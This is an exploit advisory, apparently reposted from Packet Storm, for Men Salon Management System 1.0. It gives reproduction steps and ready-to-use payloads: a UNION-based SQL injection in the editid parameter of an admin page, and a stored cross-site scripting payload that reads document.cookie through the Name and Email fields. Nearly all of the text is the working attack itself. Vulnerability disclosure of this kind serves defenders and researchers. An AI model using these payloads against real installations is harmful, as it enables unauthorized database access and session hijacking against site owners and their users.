Share
## https://sploitus.com/exploit?id=PACKETSTORM:164124
# Exploit Title: Men Salon Management System 1.0 - Multiple Vulnerabilities  
# Date: 2021-09-09  
# Exploit Author: Aryan Chehreghani  
# Vendor Homepage: https://phpgurukul.com  
# Software Link: https://phpgurukul.com/men-salon-management-system-using-php-and-mysql  
# Version: 1.0  
# Tested on: Windows 10 - XAMPP Server  
  
# Vulnerable page :  
http://localhost/msms/admin/edit-customer-detailed.php?editid=  
  
# Proof Of Concept :  
# 1 . Download And install [ Men Salon Management System ]  
# 2 . Go to /msms/admin/index.php and Enter Username & Password  
# 3 . Navigate to >> Customer List   
# 4 . In the action column, click Edit   
# 5 . Enter the payload into the Url and Fields  
  
# [ Sql Injection ] :  
  
Vulnerable paramater :  
The editid paramater is Vulnerable to sqli  
  
GET : http://localhost/msms/admin/edit-customer-detailed.php?editid=2'+union+select+1,database(),3,4,5,6,7,8--+  
  
# [ Stored Cross-Site Scripting ] :   
  
Vulnerable Fields : Name & Email  
  
Payload Used: "><script>alert(document.cookie)</script>